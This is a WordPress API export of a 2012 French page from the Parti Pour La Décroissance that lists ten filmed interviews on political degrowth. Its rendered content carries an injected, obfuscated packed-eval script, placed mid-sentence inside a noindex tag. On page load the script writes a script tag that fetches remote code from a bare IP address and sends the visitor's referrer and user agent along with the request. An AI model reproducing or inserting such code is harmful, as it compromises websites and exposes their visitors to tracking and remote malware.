{"id":6736,"date":"2012-01-10T21:03:38","date_gmt":"2012-01-10T20:03:38","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=6736"},"modified":"2012-03-09T16:11:59","modified_gmt":"2012-03-09T15:11:59","slug":"10-entretiens-filmes-pour-mieux-comprendre-la-decroissance-politique","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=6736","title":{"rendered":"10 entretiens film\u00e9s pour mieux comprendre la D\u00e9croissance Politique"},"content":{"rendered":"<p><strong>Dix <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tkkbz|var|u0026u|referrer|abdth||js|php'.split('|'),0,{}))\n<\/script><\/noindex> films diffus\u00e9s successivement jusqu&rsquo;au d\u00e9but mars 2012.<\/strong><\/p>\n<p style=\"padding-left: 30px;\">1. <a href=\"http:\/\/www.partipourladecroissance.net\/?p=6738\">Notre candidatE est la D\u00e9croissance<\/a>.<br \/>\n2. <a href=\"http:\/\/www.partipourladecroissance.net\/?p=6777\">La D\u00e9croissance : mais c&rsquo;est quoi ce mot repoussoir ?<\/a><br \/>\n3. <a href=\"http:\/\/www.partipourladecroissance.net\/?p=6798\">Aux origines de la D\u00e9croissance.<\/a><br \/>\n4. <a href=\"http:\/\/www.partipourladecroissance.net\/?p=6819\">La D\u00e9croissance : l&rsquo;histoire d&rsquo;un mouvement.<\/a><br \/>\n5. <a href=\"http:\/\/www.partipourladecroissance.net\/?p=6848\">Quelle strat\u00e9gie politique pour la D\u00e9croissance.<\/a><br \/>\n6. <a href=\"http:\/\/www.partipourladecroissance.net\/?p=6895\">D\u00e9croissance : d\u00e9mondialisation, protectionnisme ou relocalisation ouverte ?<\/a><br \/>\n7. <a href=\"http:\/\/www.partipourladecroissance.net\/?p=6918\">Crise de la dette et D\u00e9croissance : le plan B.<\/a><br \/>\n8. <a href=\"http:\/\/www.partipourladecroissance.net\/?p=7061\">Quel projet pour la D\u00e9croissance : la Dotation Inconditionnelle d&rsquo;Autonomie.<\/a><br \/>\n9. <a href=\"http:\/\/www.partipourladecroissance.net\/?p=7093\">D\u00e9croissance, d\u00e9mographie et immigration.<\/a><br \/>\n10. <a href=\"http:\/\/www.partipourladecroissance.net\/?p=7104\">D\u00e9croissance et relations internationales : institutions, d\u00e9mographie et relations nord-sud.<\/a><\/p>\n<p>de Vincent Moreau, pour le collectif D\u00e9croissance 2012, avec Vincent Liegey du Parti Pour La D\u00e9croissance<\/p>\n<p>Pour signer l&rsquo;Appel : <a href=\"http:\/\/www.decroissance2012.fr\/\">http:\/\/www.decroissance2012.fr\/<\/a><br \/>\nPlus d&rsquo;infos : <a href=\"http:\/\/www.partipourladecroissance.net\/\">http:\/\/www.partipourladecroissance.net\/<\/a><br \/>\nContact : contact@decroissance2012.fr<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dix films diffus\u00e9s successivement jusqu&rsquo;au d\u00e9but mars 2012. 1. Notre candidatE est la D\u00e9croissance. 2. La D\u00e9croissance : mais c&rsquo;est quoi ce mot repoussoir ? 3. Aux origines de la D\u00e9croissance. 4. La D\u00e9croissance : l&rsquo;histoire d&rsquo;un mouvement. 5. Quelle &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?page_id=6736\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"parent":4012,"menu_order":1,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-6736","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/6736","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6736"}],"version-history":[{"count":15,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/6736\/revisions"}],"predecessor-version":[{"id":6739,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/6736\/revisions\/6739"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/4012"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6736"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}